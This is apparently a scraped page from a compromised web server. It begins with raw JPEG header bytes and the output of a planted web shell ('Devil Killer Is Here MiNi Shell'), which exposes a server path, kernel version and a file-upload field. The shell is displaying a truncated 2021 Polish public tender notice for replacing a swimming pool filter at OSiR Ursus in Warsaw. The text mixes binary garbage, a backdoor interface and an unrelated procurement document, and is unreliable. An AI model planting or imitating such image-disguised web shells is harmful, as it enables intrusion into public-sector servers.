JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210902/0016857001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wymiana wielowarstwowego filtra w obiegu uzdatniania wody dla basenu rekreacyjnego na podbaseniu pływalni Skalar w OSiR Ursus przy ul. Sosnkowskiego 3 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Sportu i Rekreacji m.st. Warszawy w Dzielnicy Ursus</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015720381</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">gen. K. Sosnkowskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-495</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">222501901</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">osir@osirursus.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.osirursus.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sport i rekreacja </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana wielowarstwowego filtra w obiegu uzdatniania wody dla basenu rekreacyjnego na podbaseniu pływalni Skalar w OSiR Ursus przy ul. Sosnkowskiego 3 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c9328445-0c0a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00168570</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00027314/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa i instalacja wielowarstwowego filtra w obiegu uzdatniania wody dla basenu rekreacyjnego na podbaseniu pływalni Skalar , ul. Sosnkowskiego 3 w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://osirursus.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://osirursus.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">•	Wymagania techniczne:<br/>a) dostęp do sieci internet;<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>c) włączona obsługa JavaScript;<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>e) zainstalowany Acrobat Reader;<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>•	Dopuszczalne przeglądarki internetowe: Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11, Google Chrome 31, Mozilla Firefox 26, Opera 18;<br/><br/>W przypadku pojawienia się w trakcie trwania aukcji białego ekranu bądź informacji "Przerwa techniczna" obowiązkowo w pierwszej kolejności należy odświeżyć przeglądarkę.<br/><br/>W przypadku wystąpienia dalszych problemów prosimy o kontakt z działem Helpdesk Logintrade: +48 71 787 35 34.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ośrodek Sportu i Rekreacji m. st. Warszawy w Dzielnicy Ursus, ul. K. Sosnkowskiego 3, 02- 495 Warszawa informuje, że:<br/>1.	Informacje dotyczące administratora danych<br/>Administratorem Pani/Pana danych osobowych jest Ośrodek Sportu i Rekreacji m. st. Warszawy w Dzielnicy Ursus, ul. K. Sosnkowskiego 3, 02- 495 Warszawa (nr tel.: 22 250 19 01, adres e-mail: osir@osirursus.pl<br/>2.	Inspektor ochrony danych<br/>W Ośrodku Sportu i Rekreacji m. st. Warszawy w Dzielnicy Ursus wyznaczony został Inspektor Ochrony Danych, z którym można skontaktować się pod numerem adresem e-mail: iod@osirursus.pllub poczty tradycyjnej przesyłając na adres Administratora.<br/>3. Cel przetwarzania Państwa danych oraz podstawy prawne <br/>1)	Wynika to bezpośrednio z konkretnego przepisu prawa, tj. ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz aktów wykonawczych do niej wydanych; ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych, Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/678 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu tych danych, ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych, ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach lub jest niezbędne do wykonania zadania w interesie publicznym albo w ramach sprawowania władzy publicznej.<br/>2)	Pani/Pana dane osobowe przetwarzane są w celu/celach: ubiegania się o udzielenie zamówienia publicznego - Przebudowa dachu pływalni Albatros w ramach zadania inwestycyjnego pn. Modernizacja dachu pływalni Albatros OSiR Ursus przy ul. Orląt Lwowskich 1.<br/>3)	Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że w zależności od przedmiotu zamówienia, zamawiający może żądać ich podania na podstawie przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz wydanych do niej przepisów wykonawczych.<br/>4.	Okres przechowywania danych<br/> Pani/Pana dane osobowe będą przechowywane przez czas wymagany przepisami prawa, tj. przez okres wynikający z przepisów ustawy Prawo zamówień publicznych, tj. okres niezbędny do realizacji celu/celów określonych powyżej, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy powszechnie obowiązującego prawa. Potem, zgodnie z przepisami, dokumenty trafią do archiwum zakładowego.<br/>5. Komu przekazujemy Państwa dane<br/>1)	Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne. <br/>2)	Ograniczenie dostępu do Państwa danych o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>3)	Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o za mówienie publiczne mogą być podmioty z którymi Administrator zawarł umowy lub porozumienie na korzystanie z udostępnianych przez nie systemów informatycznych w zakresie przekazywania lub archiwizacji danych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie do możliwości zapoznania się z tymi danymi w związku ze świadczeniem usług wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.<br/>4)	organy publiczne i inne podmioty, którym</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/3/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. OPIS OGÓLNY PRZEDMIOTU ZAMÓWIENIA<br/>Wymiana w obiegu uzdatniania wody dla basenu rekreacyjnego na podbaseniu pływalni Skalar ul Sosnkowskiego 3 w Warszawie wyeksploatowanego filtra wielowarstwowego „Bobbin Wound”. Przedmiot zamówienia obejmuje:<br/>1)	dostarczenie nowego filtra zapewniającego takie same parametry, jakie posiada filtr obecnie pracujący w zakresie: przepływów wody, powierzchni i prędkości filtracji oraz płukania filtra,<br/>2) demontaż i utylizację istniejącego filtra,<br/>3)	montaż nowego filtra, dostarczenie i zasypanie wsadu filtracyjnego oraz z uruchomienie,<br/>4)	wykonanie schematu technologicznego układu,<br/>5)	opracowanie instrukcji obsługi i konserwacji filtra, <br/>6)	szkolenie pracowników obsługi,<br/>7)	przeprowadzenie odbioru i uzyskanie decyzji od UDT dopuszczającej do użytkowania filtr<br/> i instalację. <br/>Zgodnie z dokumentacją powykonawczą, instalacje uzdatniania wody basenowej na pływalni „Skalar” ul. Sosnkowskiego 3 w Warszawie zostały uruchomione w 2004 r. Poza okresem planowanych przerw technologicznych instalacje pracują nieprzerwanie do chwili obecnej.<br/>B. ELEMENTY INSTALACYJNE – TECHNOLOGIA UZDATNIANIA WODY BASENOWEJ:<br/>Użytkowane obecnie ciśnieniowe wielowarstwowe filtry basenowe są dopuszczone przez UDT do dalszej eksploatacji, poza jednym - filtrem basenowym w obiegu rekreacji, który ze względu na rozszczelnienie przy podstawie zewnętrznej powłoki filtra został zakwalifikowany do wymiany.<br/>Instalacja sterowania pracą filtrów jest wykonana w oparciu o zawory pneumatyczne firmy EBRO.<br/>Hydraulika instalacji technologicznej oraz konstrukcja filtrów sprawiają, że spełnione są wymagania stawiane dla wody basenowej, określone w rozporządzeniu Ministra Zdrowia z dnia 9 listopada 2015 r. w sprawie wymagań, jakim powinna odpowiadać woda na pływalniach (Dz.U. z dnia 2 grudnia 2015r, poz. 2016).<br/><br/>C. STAN OBECNY:<br/>1)	filtry basenowe w obiekcie mają wymienione złoża filtracyjne,<br/>2)	układy dozowania środków chemicznych są sprawne,<br/>3)	pompy obiegowe są sprawne,<br/>4)	kłady podgrzewania wody basenowej jest sprawny,<br/>5)	instalacje basenowe są przystosowane do poboru próbek wody do badania zgodnie z obowiązującymi przepisami,<br/>6)	zbiorniki chemii basenowej oraz wszystkie węże dozujące nadają się do dalszego użytkowania.<br/>7)	układy uzupełninia świeżej wody wodociągowej pracują w automatyce,<br/>8)	w obrębie podbasenia przebiegają instalacje dla wszystkich mediów,<br/>9)	we wszystkich obiegach wody basenowej poziom środków uzdatniania wody jest utrzymywany w normie,<br/>10)	elementy zasilania i zabezpieczenia elektryczne są wymieniane na bieżąco i nie wymagają wymiany.<br/>D. CHARAKTERYSTYCZNE PARAMETRY TECHNICZNE<br/>Filtr basenowy wielowarstwowy Bobbin Wound ze złożem wielowarstwowym, piaskowo – węglowym, do uzdatniania wody basenowej w obiegu technologicznym basenu rekreacyjnego, to stały zbiornik ciśnieniowy zbudowany jest przez firmę SERVAQUA - Proligon Industrial La Coromina C/ Industria S/N -08660 Balsareny (Spain), TYP WDF 6,65 M , Nr fabryczny 072A005655, Nr ewidencyjny N7327017276 rok budowy 2003. Wykonany jest z żywicy poliestrowej i włókna szklanego, a więc z materiałów, które nie nadają wodzie basenowej w żaden sposób właściwości korozyjnych. Wewnątrz filtra zamontowany jest kolektor filtracyjny i dyfuzor PVC i PP, odporne na słoną wodę i zdatne do pracy w temperaturze do 50 stopni Celsjusza. Specjalna warstwa pokrywająca ściankę wewnętrzną nadaje mu wysoką odporność na zużycie i ścieranie i odporność na ozon, bez negatywnego wpływu na jakość wody. Filtr przeznaczony jest do uzdatniania wody basenowej zgodnie z odpowiednimi normami. Wypełniony jest on złożem piaskowo – węglowym do wysokości 1200 mm, umieszczonym na dnie dyszowym. Na złożu usuwane są zanieczyszczenia mechaniczne i fizykochemiczne. Do filtra napływa woda basenowa tłoczona za pomocą pomp obiegowych o mocy 7,5 kW każda ( 2 szt.) i nominalnej wydajności Q =90 m3/h, h = 15 metrów słupa wody. Filtr pracuje w układzie równoległej pracy dwóch identycznych filtrów o średnicy d = 2000 mmm, wysokość 2500 mm, pojemność 6650 l, powierzchnia filtracyjna filtra 3,14 m2 (każdy), zasilanych dwiema pompami obiegowymi. W przestrzeni filtracyjnej nadciśnienie obliczeniowe (nominalne ) 2,5 kg/cm2 , temperatura obliczeniowa 50°C.<br/>Do filtra jest dopływ wody basenowej o podwyższonej zawartości chloru wolnego (do 0,5 mg/l) i ozonu ( do 0,3 mg/l). Uzyskiwana prędkość filtracji 30 m 3/ h/m2, wielkość przepływu 94 m3/h. <br/>Filtr zaopatrzony jest w następujące urządzenia dodatkowe: <br/>- przepustnice wodne d = 160 mm o napędzie pneumatycznym (5 szt. – orurowanie frontowe), <br/>- zawór kulowy d =50 mm na spuście,<br/>- zawór kulowy d=20 mm na odpowietrzaniu ręcznym,<br/>- odpowietrznik automatyczny ¾ ’’,<br/>- manometry różnicy ciśnień na wlocie i wylocie,<br/>- tablica poboru próbek wody.<br/>Zestawienie sprzętu na zbiorniku : <br/>- zawieradło dolotowe 1 szt. ø 225, PVC;<br/>- zawieradło odlotowe 1 szt. ø 225, PVC<br/>- zawieradło spustowe 1szt. PN 50 2”, PVC<br/>- urządzenie odpowietrzające 1 szt. PN 20 ¾ ‘,’ PVC /stal<br/>- urządzenie do pomiaru ciśnienia 2 szt. 0-2,5 bar, PVC<br/>- właz 2 szt. PN 400, PVC<br/>Zasilanie zbiornika:<br/>Pompy i instalacja zapewniają wodę:<br/>- przy stracie ciśnienia na poziomie minimum 10 m słupa wody;<br/>- do płukania filtra prędkość przepływu minimum 50 – 60 m/h<br/>Dane dotyczące źródeł zasilania zbiornika:<br/>Woda do filtra dopływa z basenu, tłoczona przez pompy obiegowe basenu rekreacyjnego. Typ pomp obiegowych 10/100 X , moc 7,5 kW każda. Są to pompy pionowe, ze zintegrowanym filtrem wstępnym. Na końcu tłocznym każdej z pomp zainstalowano zawór odcinający i zawór zwrotny oraz manometr (o zakresie 0-0,6 MPa).<br/>Nominalne parametry pracy pomp to Q=90 m3/h, h = 15 metrów słupa wody. Max wysokość podnoszenia pompy H = 21 metrów słupa wody, co jest mniejsze, niż ciśnienie obliczeniowe filtra (2,5 bar). <br/><br/>E. AKTUALNE UWARUNKOWANIA WYKONANIA PRZEDMIOTU ZAMÓWIENIA<br/>ELEMENTY BUDOWLANE:<br/>Obiekt krytej pływalni jest użytkowany w sposób ciągły. Jego układ konstrukcyjny oraz wielkość dróg transportowych uniemożliwiają usunięcie i wprowadzenie urządzeń wielkogabarytowych w całości, ponieważ ich wielkość przekracza gabaryty otworów drzwiowych. <br/>Należy przewidzieć jedno z rozwiązań :<br/>- wykonanie odpowiednich dróg transportowych pod filtr przy obecnych gabarytach,<br/>- zastosowanie filtra montowanego z kilku elementów na miejscu posadowienia,<br/>- montaż dwóch filtrów zamiast jednego większego.<br/>Zabezpieczenie terenu składowania odpadów oraz przechowywania materiałów i urządzeń leży po stronie Wykonawcy. Po zakończeniu prac cały teren oraz konstrukcje należy przywrócić do staniu pierwotnego.<br/><br/>OGÓLNY ZAKRES PRAC: <br/>- zabezpieczenie na czas robót związanych z wymianą filtra ciągłość pracy drugiego filtra pracującego równolegle w układzie przez dostarczenie i zamontowanie zaworów pozwalających na czasowe odcięcie orurowania łączącego go z bliźniaczym filtrem,<br/>- opróżnienie uszkodzonego filtra ze złoża i utylizacja,<br/>- demontaż filtra i utylizacja,<br/>- przygotowanie, sprawdzenie, odbudowa fundamentów pod nowy filtr/filtry basenowy,<br/>- dostawa nowego filtra (lub filtrów) z powłoką ozonoodporną i z zespołem manometrów, zaworów, odpowietrznikiem,<br/>- dostosowanie orurowania, <br/>- montaż filtra,<br/>- dostarczenie i zasypanie filtra nowym złożem o odpowiedniej granulacji zgodnie z DTR i wymaganiami stosownych norm technicznych, <br/>- uruchomienie,<br/>- przygotowanie dokumentów i zgłoszenie do UDT,<br/>- dopuszczenie instalacji przez UDT do eksploatacji,<br/>- protokoły z wykonania robót,<br/>- gwarancje.<br/>F. OGÓLNE WYMAGANIA<br/>Przed złożeniem oferty Wykonawca zobowiązany jest, na własną odpowiedzialność, koszt i ryzyko, odbyć wizję lokalną, tj. dokonać oględzin miejsca wykonywania przedmiotu zamówienia (wizytację pomieszczeń przeznaczonych na instalację filtra oraz ich otoczenia) w celu oceny wszystkich okoliczności koniecznych do przygotowania rzetelnej oferty, obejmującej wszelkie niezbędne prace przygotowawcze, zasadnicze, tymczasowe i towarzyszące, zarówno do prowadzenia robót instalacyjno-montażowych, jak i przygotowania projektu - schematu technologicznego układu.<br/>Pracownicy Wykonawcy dopuszczeni do zasypu złoża, zobowiązani są do posiadania ważnej książeczki zdrowia na potrzeby sanitarno-epidemiologiczne lub orzeczenia do celów sanitarno-epidemiologicznych. Prace związane z wymianą złoża należy wykonywać zdezynfekowanym sprzętem oraz w zdezynfekowanym obuwiu.<br/>Zamawiający ma prawo do przeprowadzenia kontroli Wykonawcy w tym zakresie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43324100-1 - Urządzenia do basenów kąpielowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">85 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, określone w art. 112 ust. 2 ustawy Pzp, dotyczące:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym; <br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej; <br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.<br/>4)	zdolności technicznej lub zawodowej, tj.:<br/>Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli wykaże, że:<br/> <br/>a)	nie wcześniej niż w okresie ostatnich 5 lat, licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał: co najmniej 1 (jedną) usługę o wartości brutto minimum 200 000,00 zł, polegającą na dostarczeniu i instalacji/montażu techniki basenowej do basenów wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane.<br/><br/>Uwaga: <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji w/w usług, wykonanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w Rozdziale IX część 3 ppkt 1 lit. a) SWZ, dotyczy usług, w których wykonaniu Wykonawca bezpośrednio uczestniczył.<br/><br/>* W przypadku gdy kwoty w złożonych dokumentach podane będą 